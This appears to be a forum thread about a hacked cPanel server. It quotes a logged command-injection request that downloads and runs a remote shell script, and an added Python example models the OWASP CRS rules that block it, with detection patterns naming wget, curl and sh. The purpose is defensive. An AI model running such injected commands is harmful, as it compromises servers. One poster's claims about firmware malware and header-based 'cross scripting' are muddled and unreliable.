Comments

11 comments

  • sktest123
    Sort of command injection via the PHP CGI query string; it seems to be trying to download a remote shell script to tmp and execute it.
  • cPanelMichael
    Hello, the previous post includes an accurate description of what it looks like the attack was attempting to do. Let us know if you have additional questions. Thank you.
  • webstuff
    There was a security issue with a PHP file and tmp files were being deleted. I'm not sure if this helps any:

        Uptime: 123 seconds
        Executable: /usr/bin/php
        Command Line (often faked in exploits): /usr/bin/php
        Network connections by the process (if any):
        tcp: 127.0.0.1:33596 -> 127.0.0.1:3306
        tcp: 127.0.0.1:33598 -> 127.0.0.1:3306
        Files open by the process (if any):
        /usr/local/apache/logs/error_log
        /usr/local/apache/logs/error_log
        /tmp/.ZendSem.gYLBCK (deleted)
        /tmp/ZCUDi4colR (deleted)

    I have more of the log too. Any other ideas or suggestions on where to look? I see they are trying to connect... They tried to connect 30 times today too.
  • cPanelMichael
    There was a security issue with a php file and tmp files were being deleted..

    Hello, Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists? Thank you.
  • webstuff
    Hello, Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists? Thank you.

    Yes, I did remove the PHP hole, or at least I believe I did. So far I haven't seen any funky stuff, but I have seen this. The only other question I have with this is: do you think there is any chance they could have gotten my MySQL database login? In other words, when you see this sort of log, I assume you wouldn't need the MySQL username and password, correct? Or is there a possibility? Also, I can provide whatever else if you would like too. I do have some of the original files for some items.

    (The entire website was a complete mess. I had contacted my hosting provider and talked to the security team, and they kept telling me I had nothing to worry about, but I just didn't buy that, so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts, other alerts, etc.) But I do see connections like that in my mod_security. Just want to be 110% sure I am not missing anything.

    Also, I did happen to find some advanced malware link, I believe, to where it installs a virus in the firmware, I believe. And if I understand everything correctly, it's one of those where if you wipe the drive (complete format) it still stays on the system. Plus there were open folders, public keys, etc. I do not believe anything got changed, but then again, from my newbie side of details, I always could be missing something. There is other stuff that isn't going on which gives me reason to believe I got it too. I will gladly PM any details too. Thank you again so much for the help. Thank you again.
  • cPanelMichael
    Hello @webstuff, it's difficult to know for sure the extent to which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at: Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at: Thank you.
  • webstuff
    Yes, I removed the files. In mod_security it's showing they were trying to connect to 127.0.0.1. Can anyone point me in the right direction on this? It's showing blocked each time. Or any thoughts at all?
  • webstuff
    OK, just saw that; I looked into that. Haha, actually some top people were hired and they said they saw nothing and it was nothing to worry about. They thought it was email or some other files, which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
  • webstuff
    Just so everyone knows, after digging around I found out that there was a PHP script that was compromised. Turns out that with the one version of PHP, when you get it to crash correctly with MySQL, it would then show the login for MySQL, so then the hacker used the cross scripting (X-Frame-Options, X-Content, HTTP Strict Transport, etc.)... So they would make their script
  • TheGrumpyOne
    Hello, I am finding this string in my log file:

        "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$

    I've been getting these the last 3 weeks. Has anyone come up with a way to block this? I have OWASP, but I'm a noob when it comes to writing rules and don't want to screw things up. Thanks in advance for the help!
  • fuzzylogic
    You should not need to write rules for requests like these. I would expect the OWASP CRS to block requests like this if it is set up properly and working. In my test using the cPanel-provided rules (OWASP ModSecurity Core Rule Set V3.0, "SpiderLabs OWASP curated ModSecurity rule set"), this request triggered the remote command injection rule ids 932105 and 932115, scoring 5 anomaly points each.

    The 10 anomaly points triggered blocking rule id 949110:

        Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score.

    The 10 anomaly points triggered logging rule id 980130:

        Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0) Remote Command Execution: Windows Command Injection">
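Added example, not code from the thread or from cPanel/CRS: a small Python model of the anomaly scoring fuzzylogic describes, run against the request TheGrumpyOne quoted. The access-log format and the two regexes (simplified stand-ins for CRS rules 932105/932115) are assumptions; only the rule ids, their 5-point scores and the inbound threshold of 5 come from the post.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real logs): the first carries the request string
# quoted in the thread, the second is a benign login for comparison.
LOG_LINES = [
    '203.0.113.9 - - [01/Jan/2018:00:00:00 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20'
    'http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27 HTTP/1.1" 403 199',
    '198.51.100.7 - - [01/Jan/2018:00:00:01 +0000] "GET /login.cgi?cli=admin HTTP/1.1" 200 512',
]

# (rule id, message, pattern, anomaly score): ids, messages and scores are those the
# thread reports; the regexes are simplified stand-ins, NOT the real CRS patterns.
RULES = [
    (932105, "Remote Command Execution: Unix Command Injection (2)",
     re.compile(r"(?:^|[;&|`])\s*(?:wget|curl|bash|sh)\b"), 5),
    (932115, "Remote Command Execution: Windows Command Injection",
     re.compile(r"[;&|]\s*\S+\s+/tmp/"), 5),  # stand-in: chained command touching /tmp
]
INBOUND_THRESHOLD = 5  # "Operator GE matched 5 at TX:inbound_anomaly_score" (rule 949110)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_args(log_line):
    """Return {name: value} with each query argument percent-decoded once: CRS matches
    the decoded ARGS, so %27;wget%20... becomes the shell text the rules actually see."""
    target = REQUEST_RE.search(log_line).group("target")
    _, _, query = target.partition("?")
    args = {}
    for pair in filter(None, query.split("&")):  # split by hand: ';' is data here, not a separator
        name, _, value = pair.partition("=")
        args[unquote(name)] = unquote(value)
    return args

def score_request(log_line):
    """Run every rule over every decoded argument, sum the anomaly points and apply the
    inbound threshold, mirroring the 949110 (block) and 980130 (log) messages in the thread."""
    matched, total = [], 0
    for value in decode_args(log_line).values():
        for rule_id, _msg, pattern, points in RULES:
            if pattern.search(value):
                matched.append(rule_id)
                total += points
    blocked = total >= INBOUND_THRESHOLD
    summary = (f"Inbound Anomaly Score Exceeded (Total Inbound Score: {total} - "
               f"SQLI=0,XSS=0,RFI=0,LFI=0,RCE={total},PHPI=0,HTTP=0,SESS=0)") if blocked else "clean"
    return {"matched": matched, "score": total, "blocked": blocked, "summary": summary}

if __name__ == "__main__":
    for line in LOG_LINES:
        print(score_request(line))
```

The point for a defender tuning CRS: the rules fire on the decoded argument, so a log line that looks like harmless percent-escapes is scored as the shell command it becomes, while the benign `cli=admin` request accumulates no points and passes.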